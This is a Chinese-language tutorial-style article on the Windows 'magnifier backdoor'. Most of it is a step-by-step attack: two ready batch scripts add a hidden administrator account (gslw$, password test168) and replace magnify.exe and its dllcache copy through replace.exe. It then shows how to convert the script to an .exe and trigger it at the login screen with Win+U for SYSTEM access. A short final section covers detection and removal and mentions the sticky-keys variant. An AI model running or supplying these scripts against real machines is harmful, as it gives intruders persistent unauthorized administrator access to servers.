WINDOWS系統后門實例二 圖
放大鏡程序,最狡猾的后門
放大鏡程序(magnify.exe)是Windows 2000/XP/2003系統集成的一個小工具,它是為方便視力障礙用戶而設計的。在用戶登錄系統前可以通過“Win+U”組合鍵調用該工具,因此攻擊者就用精心構造的magnify.exe同名文件替換放大鏡程序,從而達到控制服務器的目的。
通常情況下,攻擊者通過構造的magnify.exe程序創建一個管理員用戶,然后登錄系統。當然有的時候他們也會通過其直接調用命令提示符(cmd.exe)或者系統shell(explorer.exe)。需要說明的是,這樣調用的程序都是system權限,即系統最高權限。不過,以防萬一當管理員在運行放大鏡程序時發現破綻,攻擊者一般通過該構造程序完成所需的操作后,最后會運行真正的放大鏡程序,以蒙騙管理員。其利用的方法是:
(1)構造批處理腳本
- @echo off
- net user gslw$ test168 /add
- net localgroup administrators gslw$ /add
- %Windir%\system32\nagnify.exe
- exit
將上面的腳本保存為magnify.bat,其作用是創建一個密碼為test168的管理員用戶gslw$,最后運行改名后的放大鏡程序nagnify.exe。(圖2)
(2)文件格式轉換
因為批處理文件magnify.bat的后綴是bat,必須要將其轉換為同名的exe文件才可以通過組合鍵Win+U調用。攻擊者一般可以利用WinRar構造一個自動解壓的exe壓縮文件,當然也可以利用bat2com、com2exe進行文件格式的轉換。我們就以后面的方法為例進行演示。
打開命令行,進入bat2com、com2exe工具所在的目錄,然后運行命令“bat2com magnify.bat”將magnify.bat轉換成magnify.com,繼續運行命令“com2exe magnify.com”將magnify.com轉換成magnify.exe,這樣就把批處理文件轉換成和放大鏡程序同名的程序文件。(圖3)
(3)放大鏡文件替換
下面就需要用構造的magnify.exe替換同名的放大鏡程序文件,由于Windows對系統文件的自我保護,因此不能直接替換,不過Windows提供了一個命令replace.exe,通過它我們可以替換系統文件。另外,由于系統文件在%Windir%\system32\dllcache中有備份,為了防止文件替換后又重新還原,所有我們首先要替換該目錄下的magnify.exe文件。假設構造的magnify.exe文件在%Windir%目錄下,我們可以通過一個批處理即可實現文件的替換。
- @echo off
- copy %Windir%\system32\dllcache\magnify.exe nagnify.exe
- copy %Windir%\system32\magnify.exe nagnify.exe
- replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache
- replace.exe %Windir%\magnify.exe %Windir%\system32
- exit
上面批處理的功能是,首先將放大鏡程序備份為nagnify.exe,然后用同名的構造程序將其替換。(圖4)
(4)攻擊利用
當完成上述操作后,一個放大鏡后門就做成了。然后攻擊者通過遠程桌面連接服務器,在登錄界面窗口摁下本地鍵盤的“Win+U”組合鍵,選擇運行其中的“放大鏡”,此刻就在服務器上創建了一個管理員用戶gslw$并打開了放大鏡工具,然后攻擊者就開業通過該帳戶登錄服務器。當然,攻擊者在斷開登錄前會刪除所有與該帳戶相關的信息,以防被管理員發現。(圖5)
(5)防范措施
進入%Windir%\system32\查看magnify.exe的文件圖標是否是原來的放大鏡的圖標,如果不是的話極有可能被植入了放大鏡后門。當然,有的時候攻擊者也會將其文件圖標更改為和原放大鏡程序的圖標一樣。此時我們可以查看magnify.exe文件的大小和修改時間,如果這兩樣有一項不符就比較懷疑了。
我們也可以先運行magnify.exe,然后運行lusrmgr.msc查看是否有可疑的用戶。如果確定服務器被放置了放大鏡后門,首先要刪除該文件,然后恢復正常的放大鏡程序。當然,我們也可以做得更徹底一些,用一個無關緊要的程序替換放大鏡程序。甚至我們也可以以其人之道還治其人之身,構造一個magnify.exe,通過其警告攻擊者或者進行入侵監控和取證。
與放大鏡后門類似的還有“粘滯鍵”后門,即按下SHIEF鍵五次可以啟動粘滯鍵功能,其利用和防范措施與放大鏡后門類似,只是將magnify.exe換成了sethc.exe。
【編輯推薦】
